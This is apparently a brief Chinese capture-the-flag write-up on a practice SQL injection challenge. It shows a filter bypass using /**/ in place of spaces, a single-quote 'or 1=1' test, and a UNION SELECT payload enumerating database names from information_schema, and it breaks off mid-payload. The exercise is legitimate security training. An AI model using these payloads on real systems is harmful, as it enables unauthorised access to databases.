簡單的sql注入之2 / writeup (手工注入,純屬練手)

多測試幾次可以發現,空格被註釋了,百度解決方法,用/**/代替空格的位置, 構造語句1'/**/or/**/'1'='1 確認爲單引號注入 用order by 確認select字段數,以確定union的字段數 可得,只有一個字段 獲取數據庫  1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**
相關文章
相關標籤/搜索